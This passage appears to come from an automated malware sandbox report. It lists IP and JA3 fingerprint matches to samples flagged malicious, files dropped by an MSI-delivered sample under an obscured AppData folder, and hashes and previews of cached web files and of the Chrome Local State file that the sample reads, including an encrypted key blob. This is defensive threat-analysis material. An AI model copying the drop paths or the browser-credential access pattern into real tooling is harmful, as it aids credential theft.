                                                • 162.159.133.233
                                                PO (PO202101129 & PO202101130)..exeGet hashmaliciousBrowse
                                                • 172.67.188.154
                                                ch1DRjwT7i.exeGet hashmaliciousBrowse
                                                • 104.21.19.200

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                9e10692f1b7f78228b2d4e424db3a98c34CCAE63B50259B758A5B68F579077E5152D9568CD1F9.exeGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                VM12132021_4847478505.htmGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                eo8I24hU7O.dllGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                3ozXk2Dztg.dllGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                AXd6CJka0X.dllGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                70vA8F48kT.dllGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                DOC-MICHAEL _ 10TH_DECEMBER_2021 _.HTMGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                VPrslbrF6y.dllGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                03kZT0M6c2.dllGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                qIg3GTZpTQ.dllGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                repa1.dllGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                girlKarol.dllGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                R29pDGrENg.exeGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                1aOhsWCkeZ.dllGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                t4OYxS9hOr.dllGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                t4OYxS9hOr.dllGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                96j1PPOmrT.dllGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                96j1PPOmrT.dllGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                fOkHtDFjm6.dllGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                fOkHtDFjm6.dllGet hashmaliciousBrowse
                                                • 93.158.134.119
                                                • 172.67.159.235
                                                • 104.26.9.138
                                                • 104.16.18.94
                                                • 67.199.248.10
                                                • 104.16.94.65
                                                3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Suspicious.Win32.Save.a.6627.exeGet hashmaliciousBrowse
                                                • 52.219.96.48
                                                uFDYZjPXM5.exeGet hashmaliciousBrowse
                                                • 52.219.96.48
                                                cvW19WNIFl.exeGet hashmaliciousBrowse
                                                • 52.219.96.48
                                                1Yz18o3fYe.exeGet hashmaliciousBrowse
                                                • 52.219.96.48
                                                chrome.exeGet hashmaliciousBrowse
                                                • 52.219.96.48
                                                Jxc9Byos8i.exeGet hashmaliciousBrowse
                                                • 52.219.96.48
                                                I70US4v48N.exeGet hashmaliciousBrowse
                                                • 52.219.96.48
                                                #00959.vbsGet hashmaliciousBrowse
                                                • 52.219.96.48
                                                3mf7Zgr0Nh.exeGet hashmaliciousBrowse
                                                • 52.219.96.48
                                                2NPGroFwoQ.exeGet hashmaliciousBrowse
                                                • 52.219.96.48
                                                VM12132021_4847478505.htmGet hashmaliciousBrowse
                                                • 52.219.96.48
                                                OomshaOlhWebLJEaTDudeXrVzUXdgWZbAlWCWEp.exeGet hashmaliciousBrowse
                                                • 52.219.96.48
                                                DY6NIa6uCJ.exeGet hashmaliciousBrowse
                                                • 52.219.96.48
                                                EiciKS0ik4.exeGet hashmaliciousBrowse
                                                • 52.219.96.48
                                                SecuriteInfo.com.Trojan.Injector.4383.exeGet hashmaliciousBrowse
                                                • 52.219.96.48
                                                SecuriteInfo.com.Trojan-Spy.MSIL.Stealer.gen.27309.exeGet hashmaliciousBrowse
                                                • 52.219.96.48
                                                Wed2293645fc7348.exeGet hashmaliciousBrowse
                                                • 52.219.96.48
                                                XgIwoCCrqQ.exeGet hashmaliciousBrowse
                                                • 52.219.96.48
                                                zzzzz.exeGet hashmaliciousBrowse
                                                • 52.219.96.48
                                                Genshin Impact Hack Global.exeGet hashmaliciousBrowse
                                                • 52.219.96.48

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeGeruDanfe.msiGet hashmaliciousBrowse
                                                  TJ-eProtestoBoletoIndevido.msiGet hashmaliciousBrowse
                                                    ContratoAprovado+002336.msiGet hashmaliciousBrowse
                                                      C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\libeay32.dllQnL9fgKdsQ.msiGet hashmaliciousBrowse
                                                        xAOifTxDjQ.msiGet hashmaliciousBrowse
                                                          2J8kWwjwLb.msiGet hashmaliciousBrowse
                                                            O2CRPOKa23.msiGet hashmaliciousBrowse
                                                              RcyPYGBl8t.msiGet hashmaliciousBrowse
                                                                OHqOvvjgbN.msiGet hashmaliciousBrowse
                                                                  2OfuyvjJu1.msiGet hashmaliciousBrowse
                                                                    gxJ83rJkgw.msiGet hashmaliciousBrowse
                                                                      pHEiqE9toa.msiGet hashmaliciousBrowse
                                                                        50r72IVfM0.msiGet hashmaliciousBrowse
                                                                          83ONlZMwS9.msiGet hashmaliciousBrowse
                                                                            Dxr7myLbG2.msiGet hashmaliciousBrowse
                                                                              UT3vK4jelb.msiGet hashmaliciousBrowse
                                                                                SlNXe5bAfS.msiGet hashmaliciousBrowse
                                                                                  bnFy9sHX4b.msiGet hashmaliciousBrowse
                                                                                    yDyyjJtYWT.msiGet hashmaliciousBrowse
                                                                                      y0kQ1qNTGJ.msiGet hashmaliciousBrowse
                                                                                        GeruDanfe.msiGet hashmaliciousBrowse
                                                                                          banload.batGet hashmaliciousBrowse
                                                                                            TJ-eProtestoBoletoIndevido.msiGet hashmaliciousBrowse

                                                                                              Created / dropped Files

                                                                                              C:\Config.Msi\4c6e2b.rbs
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):952886
                                                                                              Entropy (8bit):6.578422354339401
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:v3IqMXSpS2SDTQuV+vJF693IqMXSpS2SDTQuV+vJF6I:v3I1XF2ETQuVcJF693I1XF2ETQuVcJFJ
                                                                                              MD5:879262D6BB7E05474C52E5406D57C5F2
                                                                                              SHA1:E9C174B6333E2610B3119C9ACD45ADC28D3D1EF6
                                                                                              SHA-256:342C0E702D6E8F2521FD24C9863BC3C30E55C3F5A752235BB82E1DE66EF3C6ED
                                                                                              SHA-512:2CA72CC73A57EC3163D23A3C388AB792CC9DACFB1E7DF4A493FF835231F21673709C406C581E528A7FF54A3E9354A63541FBD8BFC9F57B1147E47EB9AEDE699F
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview: ...@IXOS.@.....@%..S.@.....@.....@.....@.....@.....@......&.{C5886386-F26F-4C16-A501-438E40C8CBDA}..BND0WEPWEJFC-9UEWFF..RT.msi.@.....@.....@.....@........&.{90C8377A-5982-4C58-B235-2331AE02F8EE}.....@.....@.....@.....@.......@.....@.....@.......@......BND0WEPWEJFC-9UEWFF......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]....ProcessComponents%.Atualizando o registro de componentes..&.{DE47952B-D8FE-4B26-B511-B2A34B2BBA7F}&.{C5886386-F26F-4C16-A501-438E40C8CBDA}.@......&.{9BF9874A-F4C7-49E4-A163-A1613DDEE8B7}&.{C5886386-F26F-4C16-A501-438E40C8CBDA}.@......&.{708DDFE6-3C6B-455B-94B1-25D4771F9C73}&.{C5886386-F26F-4C16-A501-438E40C8CBDA}.@......&.{9FBCF334-2685-443B-B297-E6CAD4889E64}&.{C5886386-F26F-4C16-A501-438E40C8CBDA}.@......&.{EADA3D85-CAF6-4403-8638-6A283DB68C9E}&.{C5886386-F26F-4C16-A501-438E40C8CBDA}.@......&.{95200D52-7ADF-4F41-A655-1595229A1998}&.{C5886386-F26F-4C16-A501-438E40C8CBDA}.@........CreateFolders..Cria
                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\NJ1L9FBN\websetnet[1].xml
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1725
                                                                                              Entropy (8bit):4.900137779249807
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:yK8U3jdQ1dhio/85Y3eDNWi6evtl2YThSYWo5dM0f2V0e37c:P8U3jdQ1db/yEINWi6otl2YThJWo5Seh
                                                                                              MD5:EE00AE3FDE994EB1A26C69A2102B3AC1
                                                                                              SHA1:1015D33F7048AD414EBE7C8EB5B66CF06BCB8DDC
                                                                                              SHA-256:9570EA9FEE56D061BC2E8A69D7912CD855105EFC4007548F207221273FBEA962
                                                                                              SHA-512:4B75B53BBC33AC8D72705BAD19E571F56A195116359FB227125C1532ADE8BF50EB9FAF311D88064DB5F83E559061159A330A001E110B26A7CD42145CCF45FC40
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview: <root><item name="_ym36618640_lsid" value="435284439026" ltime="2775065584" htime="30929096" /><item name="_ym36618640_reqNum" value="1" ltime="2775695584" htime="30929096" /><item name="_ym_uid" value="&quot;1639472259545300708&quot;" ltime="2775695584" htime="30929096" /><item name="_ym_retryReqs" value="{&quot;1&quot;:{&quot;protocol&quot;:&quot;https:&quot;,&quot;host&quot;:&quot;mc.yandex.ru&quot;,&quot;resource&quot;:&quot;watch&quot;,&quot;time&quot;:1639472259541,&quot;counterType&quot;:&quot;0&quot;,&quot;params&quot;:{&quot;page-url&quot;:&quot;https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google&quot;,&quot;charset&quot;:&quot;utf-8&quot;,&quot;ut&quot;:&quot;noindex&quot;},&quot;browserInfo&quot;:{&quot;pv&quot;:1,&quot;gdpr&quot;:&quot;14&quot;,&quot;vf&quot;:&quot;23bzrp1wl04csam1en&quot;,&quot;fu&quot;:0,&quot;en&quot;:&quot;utf-8&quot;,&quot;la&quot;:&quot;en-US&quot;,&quot;v&quot;:&quot;720&quot;,&quot;cn&quot;:1,&quot;dp&quot;:&quot
                                                                                              C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State
                                                                                              Process:C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):87215
                                                                                              Entropy (8bit):6.10281075256893
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:q9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR/:KsfFcbXafIB0u1GOJmA3iuR/
                                                                                              MD5:0FA5A6101B3B47BF28E7F8FFCFCC4127
                                                                                              SHA1:C540D0AA65648AAD6320133CD7172BDA8F40CD63
                                                                                              SHA-256:DCB2B7E6A68EEF6FA3A2645450E30ED4C8E3AC437EC673B22C44ED8553A9EEE8
                                                                                              SHA-512:5FE0247F68B214CA033C362A916488E76B0511F954FD6F606547B32AD3412CAC5446A0FB536746000A1783D7F01436BFAE8AE5A082FE545D59D75ED85C508B0C
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode":{"enabled":false},"hardware_acceleration_mode_previous":false,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"p
                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{DD0F9177-5CBB-11EC-90E9-ECF4BB862DED}.dat
                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):5632
                                                                                              Entropy (8bit):2.0485989520349226
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:rXGWTwGo4Xh/MXy8xOxQx0lxfxd8xOxQxexBlxfx:t78xOxQxmxfxd8xOxQxexHxfx
                                                                                              MD5:75E514860B5C3E47B4BD340377CBDAA2
                                                                                              SHA1:B0A1D06D06CDCAAD8C149E27EC3C749A13EF71C0
                                                                                              SHA-256:8FECA112EF71E45A4591C4AF21D1D0542156E9D8B48CB1F67CA258ADEBD64754
                                                                                              SHA-512:45C4ED230262910554C68133DF9C6EB667713FC1F6DF8DFC5801D72EA46408744A49C0DF5E7673942F01CFD913F60DC899844996DC43F7154AC6F2C51B17DB3E
                                                                                              Malicious:false
                                                                                              Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................P.]...................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t.......................................................................................................0.......O._.T.S.e.J.E.P.3.b.t.c.7.B.G.Q.6.e.z.0.u.4.Y.t.7.Q.=.=.........:.......................................
                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{DD0F9179-5CBB-11EC-90E9-ECF4BB862DED}.dat
                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):4608
                                                                                              Entropy (8bit):1.8909773703009556
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:rl0ZGF6JrEgmf676FcXrEgmfe7qg49lTa547tLW+J1Yo9lmatQsfpo96QJqaioup:r0GOG+49lHlWkKo9lgsfE6Lk+LQQx
                                                                                              MD5:FE49DFF40B93387303C7F8FDA7CBD692
                                                                                              SHA1:4CDC4D029F8B90205C626F122160FE8B239EC943
                                                                                              SHA-256:3CC28C4EC1C23BC49D572403EF167EE163E5BEAA509565C87153746BB8CCE94F
                                                                                              SHA-512:2F4E2BC99E13BCE6D25242CD1CF6CBEBD1A8A78BC4B01EC38212549DDE7CCE9F95397F16C849C04A0837F52DDCC5F3A74D99748B6DE7AE3D9E89ACBF6B6439A8
                                                                                              Malicious:false
                                                                                              Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................P.-...................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\api[1].js
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):35662
                                                                                              Entropy (8bit):5.289565799540458
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:eIEo7x4VqTHUlEulsfi+P1u0C9tJXTPDbYYFfct/1VMp9JddY8PmE4k7DgGSB:e2yYYac1TssM
                                                                                              MD5:6C6281C15CBC981BC05942BAC40BCD7E
                                                                                              SHA1:6015D314D852ECC0C0158731D8E06724805E38E5
                                                                                              SHA-256:0D3118E306C6A26F1D2EFCB698984E6922C5E7E155C94A84760E36E5592A3C11
                                                                                              SHA-512:7DB423D081304661C5981C6FC6D37CE2F32DBE8B8C38A9D2791DBD6110DB36261FA249A1662F667B58AA5B1A88446AD65D90B6EFBBEE0DA1378BD39BB1FE0DB2
                                                                                              Malicious:false
                                                                                              Preview: /**. * @license. * Copyright (c) 2015 Andr. Cruz <amdfcruz@gmail.com>. * Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the 'Software'), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:. * The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.. * THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, A
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\front-end[1].css
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):8873
                                                                                              Entropy (8bit):4.933512276970135
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:uMkzjvef90nBjdu7oN6AE4O+kCK+D9XGIjLCB:uMmg0B6oN6AE4OVCFD9XzLCB
                                                                                              MD5:6D146A3CD5F5324BD1165FB7E2BBCC6F
                                                                                              SHA1:34B056FB196FA7F016370BA60BA4D3F1E8EAC601
                                                                                              SHA-256:3AC18FEBF4DD3CCCE7FE7AB01CD43E43B62D1E7D50FC682C6FAC67FC14CAA502
                                                                                              SHA-512:2ECBCF33F6F71378DF79FE8D9964CE19BCB534B78C605CCD042B41334CAFC1E71352F123366F8A70DF083674A0C44C36C34AD6806BC4CBEEF6FBB8AAEC779782
                                                                                              Malicious:false
                                                                                              Preview: .entry-content p.has-drop-cap:not(:focus)::first-letter{font-size:7.7em;margin:.1em .08em 0 -.08em}.entry-content p.has-larger-font-size.has-drop-cap:not(:focus)::first-letter,.entry-content p.has-small-font-size.has-drop-cap:not(:focus)::first-letter{margin-right:.03em}.alignfull:not(.has-background) .wp-block-group__inner-container>p:not(.has-background-color){padding-left:30px;padding-right:30px}.site-container p.has-background{padding:25px 30px}.site-container p.has-background.box-shadow{box-shadow:0 0 20px rgba(0,0,0,.1)}.site-container p.has-text-color a,.site-container p.has-background a{color:inherit}.site-container p.has-background a:focus,.site-container p.has-background a:hover,.site-container p.has-text-color a:focus,.site-container p.has-text-color a:hover{color:inherit;text-decoration:none}.site-container p.has-background.light-text a{color:#fff;text-decoration:underline}.site-container p.has-background.light-text a:focus,.site-container p.has-background.light-text a:hove
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\gtranslate-style24[1].css
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):650
                                                                                              Entropy (8bit):4.870543744080228
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:4DAYVc5hLSFIF51rog5n8oE5n8J0TX1d2GOcJ0v2TL9e2LxN8w6eKubq:4DAYVc5lF51rT5n8N5n8Jm1LOcJ0vm9U
                                                                                              MD5:B1B4A32633503B5F5EEB86B59602E702
                                                                                              SHA1:954FBD1B40CA6AFF8BF427823869FA2424551F16
                                                                                              SHA-256:6A558670783199BB955EF7D0263B756A836CAC2B7644B263B3BA9BC43E4D21D3
                                                                                              SHA-512:209557DBA2C6D823022DC8FF2F33E393B6DDDFF3E876DBED7FBFACA46544D7B40B734F18BB6DEA9C2EEA7FC881E469DB6B172E80B6DA714EBABFBFC06B180C96
                                                                                              Malicious:false
                                                                                              Preview: a.gflag{font-size:24px;padding:1px 0;background-repeat:no-repeat;background-image:url(24.png)}a.gflag img{border:0;height:24px;display:inline}a.gflag:hover{background-image:url(24a.png)}img.gstats{display:none}a.alt_flag{background-image:url(alt_flags.png)}a.alt_flag:hover{background-image:url(alt_flagsa.png)}a.us_flag{background-position:0 -100px}a.br_flag{background-position:-100px -100px}a.mx_flag{background-position:-200px -100px}a.glink{text-decoration:none}a.glink span{margin-right:5px;font-size:15px;vertical-align:middle}a.glink img{vertical-align:middle;display:inline;border:0;padding:0;margin:0;opacity:.8}a.glink:hover img{opacity:1}
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\rocket-loader.min[1].js
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):12332
                                                                                              Entropy (8bit):5.0916439525688215
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:3dArCS2Z+j/yQ9TCQxUhW2DPY808LE676SbHDc/7uN0VZG05w:NHSG+j/y2xa3bn7Q+0a0O
                                                                                              MD5:88A769D2FE35899FD45A332A0A032CC0
                                                                                              SHA1:514C6C1D8475D17E412849A4C90159517D0FA10A
                                                                                              SHA-256:CCF00D1923B0131A10E0C6D26F95E5DEE6EBF8621A27E83C5A2F68A2E0093142
                                                                                              SHA-512:756CC5CD029FC4ADC9100D0DA2F2B0EFB3DF0F2BF894FBA2824019832FEA594EDD40A238A5FFACC205572CC0155F5632D70F54E37EDC0772460F44C69CB76AB8
                                                                                              Malicious:false
                                                                                              Preview: !function(){"use strict";function t(){return"cf-marker-"+Math.random().toString().slice(2)}function e(){for(var t=[],e=0;e<arguments.length;e++)t[e]=arguments[e];(n=console.warn||console.log).call.apply(n,[console,"[ROCKET LOADER] "].concat(t));var n}function n(t,e){var n=e.parentNode;n&&h(t,n,e)}function r(t,e){h(t,e,e.childNodes[0])}function o(t){var e=t.parentNode;e&&e.removeChild(t)}function i(t){var e=t.namespaceURI===A?"xlink:href":"src";return t.getAttribute(e)}function a(t,e){var n=t.type.substr(e.length);return!(n&&!E[n.trim()])&&((!k||!t.hasAttribute("nomodule"))&&!(!k&&"module"===n))}function c(t){return a(t,"")}function s(t,e){return function(n){if(e(),t)return t.call(this,n)}}function u(t,e){t.onload=s(t.onload,e),t.onerror=s(t.onerror,e)}function p(t){var e=document.createElementNS(t.namespaceURI,"script");e.async=t.hasAttribute("async"),e.textContent=t.textContent;for(var n=0;n<t.attributes.length;n++){var r=t.attributes[n];try{r.namespaceURI?e.setAttributeNS(r.namespace
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\sassy-social-share-public[1].css
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):34562
                                                                                              Entropy (8bit):5.723702820937497
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:ZTCnYMpViHUhsyf+QrC6g/Pmn9a+a2nyClG6fPUeDLqrua+J74O3vL/jVdGi:Q/pVM6/C6g/PE11jnUeDRRVd5
                                                                                              MD5:CC6ED088D261206173D4748074349FFD
                                                                                              SHA1:F3C5B2B054DE61C624C408BFF2DC78F94E11E7D6
                                                                                              SHA-256:D301CF998DB67E51A8631F9ED8EF8F0A67BD103F9AA236884CE55D7579CBD29C
                                                                                              SHA-512:B4938EF7E9280BC7B187D495E057580547EF21562BD9101F5DB963B218C8C7D8227C76CCC605A809A9ECC990870E6877B92B67E70CB7C3CB63E8D937A5005052
                                                                                              Malicious:false
                                                                                              Preview: #heateor_sss_error{color:red;margin:7px 0}div.heateor_sss_sharing_ul a:link,div.heateor_sss_sharing_ul a:focus{text-decoration:none;background:0 0!important}.heateor_sss_login_container{margin:2px 0}.heateor_sss_login_container img,.heateor_sss_sharing_container img{cursor:pointer;margin:2px;border:0}.heateor_sss_login_container img{display:none;float:left}#heateor_sss_loading_image{display:block!important;float:none}.heateor_sss_error{background-color:#ffffe0;border:1px solid #e6db55;padding:5px;margin:10px}#heateor_sss_sharing_more_providers{position:fixed;top:50%;left:47%;background:#fafafa;width:650px;margin:-180px 0 0 -300px;z-index:10000000;text-shadow:none!important;height:308px}#heateor_sss_popup_bg{background:url(../../images/transparent_bg.png);bottom:0;display:block;left:0;position:fixed;right:0;top:0;z-index:10000}#heateor_sss_sharing_more_providers .title{font-size:14px!important;height:auto!important;background:#58b8f8!important;border-bottom:1px solid #d7d7d7!important;c
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\style.min[1].css
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):80574
                                                                                              Entropy (8bit):4.908672693926512
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:LX1XvTz4EkA5SOV+LQ35lqCXm9XhUnoeYKiFzL487Plxo66F7UJGqUzu8ZZ+ucJ0:LX1X7DkA5SOV+LQ35S9fBFrS
                                                                                              MD5:43C4BC05B5E3B0A6684A7C3A52E63590
                                                                                              SHA1:ED6D95D525A710A82E8B8583E9BA7BCE3B2A4722
                                                                                              SHA-256:9110FC122DDA3067C424D9B8FF7747E2030B0BD9298F69A3683D399AD3373A6A
                                                                                              SHA-512:661CE465D60C6C6D5738C9A7E948985772E3CBFED985D91D704121F77B91E7CDD43421217FA9A19DBA6D2F5AC68AD4887DCE1CEDE825395966587F29C8BACE79
                                                                                              Malicious:false
                                                                                              Preview: @charset "UTF-8";#start-resizable-editor-section{display:none}.wp-block-audio{margin:0 0 1em}.wp-block-audio figcaption{margin-top:.5em;margin-bottom:1em}.wp-block-audio audio{width:100%;min-width:300px}.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;cursor:pointer;display:inline-block;font-size:1.125em;padding:calc(.667em + 2px) calc(1.333em + 2px);text-align:center;text-decoration:none;overflow-wrap:break-word;box-sizing:border-box}.wp-block-button__link:active,.wp-block-button__link:focus,.wp-block-button__link:hover,.wp-block-button__link:visited{color:#fff}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100%}.wp-block-buttons>.wp-block-button.has-custom-font-size .wp-block-button__link{font-size:inherit}.wp-block-buttons>.wp-block-bu
